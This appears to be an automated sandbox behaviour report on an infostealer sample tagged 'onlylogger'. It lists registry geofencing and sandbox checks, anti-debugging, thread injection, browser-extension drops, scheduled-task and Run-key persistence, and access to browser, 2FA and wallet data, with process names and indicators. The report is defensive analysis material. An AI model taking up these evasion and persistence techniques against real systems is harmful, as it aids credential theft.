onlylogger | 9e719c4dd5e1086d5197fded7b8cdb0d3d592c0636b0d469fcda22c9723e8e7c

System Information Discovery

Processes:

Install.exerundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Checks computer location settings 2 TTPs 12 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

Setup_x32_x64.exeFolder.exeRobCleanerInstl3183813.exe9hvXSXrdixXuUYtM4HT7kFel.exe1BwX9cFBeToivHJC1osbHAsz.exedhgUgg1lwzVFLeDAWWwO2YJd.exeIbyOOzs.exeFile.exeEJegy7njpw4NcGC4TPkpQFA9.exeInstall.exeZh3M5OU4FZcI7PVNDwUeCUKJ.exeDzNmPWdwKQwiMdPEyWA0pWIZ.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	Setup_x32_x64.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	Folder.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	RobCleanerInstl3183813.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	9hvXSXrdixXuUYtM4HT7kFel.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	1BwX9cFBeToivHJC1osbHAsz.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	dhgUgg1lwzVFLeDAWWwO2YJd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	IbyOOzs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	File.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	EJegy7njpw4NcGC4TPkpQFA9.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	Zh3M5OU4FZcI7PVNDwUeCUKJ.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	DzNmPWdwKQwiMdPEyWA0pWIZ.exe

Loads dropped DLL 8 IoCs

Processes:

beb9YTbvJFLvLXX592jpxOvD.exe9hvXSXrdixXuUYtM4HT7kFel.exerundll32.exerundll32.exerundll32.exe

pid	process
368	beb9YTbvJFLvLXX592jpxOvD.exe
2516	9hvXSXrdixXuUYtM4HT7kFel.exe
2516	9hvXSXrdixXuUYtM4HT7kFel.exe
5424	rundll32.exe
5424	rundll32.exe
4984	rundll32.exe
4984	rundll32.exe
1404	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Adds Run key to start application 2 TTPs 1 IoCs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

jg1_1faf.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg1_1faf.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jg1_1faf.exe

Drops Chrome extension 2 IoCs

Processes:

IbyOOzs.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json	IbyOOzs.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json	IbyOOzs.exe

Drops desktop.ini file(s) 1 IoCs

Processes:

IbyOOzs.exe

description ioc process

File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini IbyOOzs.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

56 ipinfo.io
57 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

description	ioc	process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	IbyOOzs.exe

flow	ioc
56	ipinfo.io
57	ipinfo.io

Drops file in System32 directory 33 IoCs

Processes:

powershell.exeIbyOOzs.exeInstall.exeJJujxgo.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	IbyOOzs.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	JJujxgo.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04	IbyOOzs.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04	IbyOOzs.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	IbyOOzs.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	IbyOOzs.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	IbyOOzs.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DA7D265139F17241687E79703FE04A16	IbyOOzs.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DA7D265139F17241687E79703FE04A16	IbyOOzs.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_A30EA9B4E1BC5DBF09A8EF399E086D27	IbyOOzs.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_13BE91B3726C56FE2616E67BB40B189C	IbyOOzs.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	IbyOOzs.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_C15B120C7F4EE6F1182923868E66174B	IbyOOzs.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	JJujxgo.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	IbyOOzs.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	IbyOOzs.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_A30EA9B4E1BC5DBF09A8EF399E086D27	IbyOOzs.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_2B2BCCF5DEF5DB0836949F960BC55B50	IbyOOzs.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	IbyOOzs.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	IbyOOzs.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	IbyOOzs.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_13BE91B3726C56FE2616E67BB40B189C	IbyOOzs.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	IbyOOzs.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	IbyOOzs.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_2B2BCCF5DEF5DB0836949F960BC55B50	IbyOOzs.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	IbyOOzs.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	IbyOOzs.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	IbyOOzs.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_C15B120C7F4EE6F1182923868E66174B	IbyOOzs.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs

Processes:

soft.exe48b85f34-ba76-4a43-8811-51001d013e78.exePSJX3kTgFrzS6xbKJXjbH2XR.exeT4GuP5xLZ5KygBfWzf7jpOvR.exeMFPmIIhwR3njJSHvNPzgPYo6.exeLzWgYoMzjeu0S_yZPBZpgsk3.exeNROUveYetDLp89YeLjvoyKcP.exeVdcmpLWQ4sQClzr_v_nHf2ng.exe1.exejg1_1faf.exe

pid	process
1292	soft.exe
3980	48b85f34-ba76-4a43-8811-51001d013e78.exe
2624	PSJX3kTgFrzS6xbKJXjbH2XR.exe
3344	T4GuP5xLZ5KygBfWzf7jpOvR.exe
3012	MFPmIIhwR3njJSHvNPzgPYo6.exe
4100	LzWgYoMzjeu0S_yZPBZpgsk3.exe
3000	NROUveYetDLp89YeLjvoyKcP.exe
4108	VdcmpLWQ4sQClzr_v_nHf2ng.exe
3668	1.exe
5324	jg1_1faf.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

ImMSMmAqtHpIJOu_JPRVxsxL.exe

description pid process target process

PID 4132 set thread context of 4976 4132 ImMSMmAqtHpIJOu_JPRVxsxL.exe ImMSMmAqtHpIJOu_JPRVxsxL.exe

description	pid	process	target process
PID 4132 set thread context of 4976	4132	ImMSMmAqtHpIJOu_JPRVxsxL.exe	ImMSMmAqtHpIJOu_JPRVxsxL.exe

Drops file in Program Files directory 25 IoCs

Processes:

jg1_1faf.exeIbyOOzs.exeZh3M5OU4FZcI7PVNDwUeCUKJ.exe1BwX9cFBeToivHJC1osbHAsz.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW	jg1_1faf.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\d.jfm	jg1_1faf.exe
File created	C:\Program Files (x86)\bQZEOuyekqRU2\tiwkFfV.xml	IbyOOzs.exe
File created	C:\Program Files (x86)\GuXKuCyCeSmjC\JbtXKws.xml	IbyOOzs.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	IbyOOzs.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	IbyOOzs.exe
File created	C:\Program Files (x86)\GuXKuCyCeSmjC\vjUmvVB.dll	IbyOOzs.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\1f85c699-401a-4fd4-aa82-1579b719b752.tmp	Zh3M5OU4FZcI7PVNDwUeCUKJ.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	1BwX9cFBeToivHJC1osbHAsz.exe
File created	C:\Program Files (x86)\Company\NewProduct\d	jg1_1faf.exe
File created	C:\Program Files (x86)\Company\NewProduct\tmp.edb	jg1_1faf.exe
File created	C:\Program Files (x86)\Company\NewProduct\d.jfm	jg1_1faf.exe
File created	C:\Program Files (x86)\uAhcATovcXckvYCnvyR\QQyeJnA.xml	IbyOOzs.exe
File created	C:\Program Files (x86)\lSmWvXKKfqUn\lUgUjNV.dll	IbyOOzs.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220202143203.pma	Zh3M5OU4FZcI7PVNDwUeCUKJ.exe
File created	C:\Program Files (x86)\wjTkFrExU\UukAkJ.dll	IbyOOzs.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	IbyOOzs.exe
File created	C:\Program Files (x86)\bQZEOuyekqRU2\zUQuykzARkAJr.dll	IbyOOzs.exe
File created	C:\Program Files (x86)\uAhcATovcXckvYCnvyR\cIdNPcP.dll	IbyOOzs.exe
File created	C:\Program Files (x86)\wjTkFrExU\aftshtn.xml	IbyOOzs.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe	1BwX9cFBeToivHJC1osbHAsz.exe
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	1BwX9cFBeToivHJC1osbHAsz.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\d	jg1_1faf.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	IbyOOzs.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	IbyOOzs.exe

Drops file in Windows directory 6 IoCs

Processes:

schtasks.exesvchost.exeWerFault.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\pyIEiyMuPIzAvWAZz.job	schtasks.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\keyValueLKG.dat	svchost.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe
File created	C:\Windows\Tasks\bnkqNuphAZeBTHhYMc.job	schtasks.exe
File created	C:\Windows\Tasks\LMrvZmpowwChRBgra.job	schtasks.exe
File created	C:\Windows\Tasks\WcTeBRgOXLrCFSZ.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 10 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
5876	4140	WerFault.exe	Sm_lvl2URwt3bkdpYbN6ppsk.exe
5864	2616	WerFault.exe	IvsskHJfubsqZ5nFS_xpOLRK.exe
6060	4148	WerFault.exe	dhgUgg1lwzVFLeDAWWwO2YJd.exe
3548	2536	WerFault.exe	UPLs6tY8WjwSKiXVW8fL8JqY.exe
1080	4148	WerFault.exe	dhgUgg1lwzVFLeDAWWwO2YJd.exe
5760	5448	WerFault.exe	c8543649-03e9-461c-bb64-bc5598521773.exe
4876	3660	WerFault.exe	EJegy7njpw4NcGC4TPkpQFA9.exe
4888	4148	WerFault.exe	dhgUgg1lwzVFLeDAWWwO2YJd.exe
6112	4148	WerFault.exe	dhgUgg1lwzVFLeDAWWwO2YJd.exe
5280	4148	WerFault.exe	dhgUgg1lwzVFLeDAWWwO2YJd.exe

Checks processor information in registry 2 TTPs 36 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

9hvXSXrdixXuUYtM4HT7kFel.exeWerFault.exeWerFault.exe93ca6fa8-9fe0-4132-baf8-6414ddbd5187.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeMusNotifyIcon.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	9hvXSXrdixXuUYtM4HT7kFel.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	93ca6fa8-9fe0-4132-baf8-6414ddbd5187.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	MusNotifyIcon.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	93ca6fa8-9fe0-4132-baf8-6414ddbd5187.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	9hvXSXrdixXuUYtM4HT7kFel.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MusNotifyIcon.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe

Creates scheduled task(s) 1 TTPs 11 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
5352	schtasks.exe
4356	schtasks.exe
3464	schtasks.exe
4888	schtasks.exe
4388	schtasks.exe
4948	schtasks.exe
5588	schtasks.exe
4576	schtasks.exe
1316	schtasks.exe
4448	schtasks.exe
3384	schtasks.exe

Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

6120 timeout.exe
4668 timeout.exe

pid	process
6120	timeout.exe
4668	timeout.exe

Enumerates system info in registry 2 TTPs 31 IoCs

Query Registry

System Information Discovery

Processes:

WerFault.exeSearchApp.exeSearchApp.exemsedge.exeInstall.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exerundll32.exeWerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SearchApp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	SearchApp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SearchApp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	SearchApp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

368 taskkill.exe
5008 taskkill.exe
3200 taskkill.exe

pid	process
368	taskkill.exe
5008	taskkill.exe
3200	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exerundll32.exesvchost.exeIbyOOzs.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\GeoVersion_EndpointFullUri = "https://geover.prod.do.dsp.mp.microsoft.com/geoversion"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyInternetBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LinkLocalConnectionCount = "0"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CacheSizeBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CDNConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLanBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkCnt = "0"	svchost.exe
